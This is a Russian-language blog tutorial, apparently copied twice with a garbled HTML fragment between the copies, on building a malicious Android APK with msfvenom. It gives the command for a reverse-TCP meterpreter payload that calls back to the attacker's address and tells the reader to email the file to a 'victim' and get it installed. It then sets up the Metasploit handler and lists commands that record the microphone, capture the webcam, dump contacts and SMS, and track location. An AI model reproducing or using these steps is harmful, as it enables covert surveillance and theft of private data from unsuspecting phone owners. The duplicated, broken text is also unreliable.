Взлом android с помощью Kali Linux


Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией  утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.

2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).

3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.

4. Запустите metasploit framework следующей командой

5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:

Запускается драйвер Payload……..

 

6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.

7. Воспользуйтесь следующими командами просмотра:

  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate

Что делать, если вылетает ошибка парсинга:

Для исправления этой ошибки загрузите signapk

После чего выполните следующие операции:

    1. Откройте папку «Signapk» и запустите расширение «cmd».

<li style=\»box-sizing: border-box; padding: 2px 0px; co

Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией  утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.

2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

root@kali:# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).

3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.

4. Запустите metasploit framework следующей командой

root@kali:# msfconsole

5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:

msf> usemulti/handler
msf exploit(handler)> set payload android/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST192.168.0.110
msf exploit(handler)> set LPORT4444

 

msf exploit(handler)> exploit
 

Запускается драйвер Payload……..

 

6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.

7. Воспользуйтесь следующими командами просмотра:

      • record_mic
      • webcam_snap
      • webcam_stream
      • dump_contacts
      • dump_sms
      • geolocate

Что делать, если вылетает ошибка парсинга:

 

Error fixing(incase you get PARSE ERROR)
 

Для исправления этой ошибки загрузите signapk

После чего выполните следующие операции:

      1. Откройте папку «Signapk» и запустите расширение «cmd».

 

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Перейти к верхней панели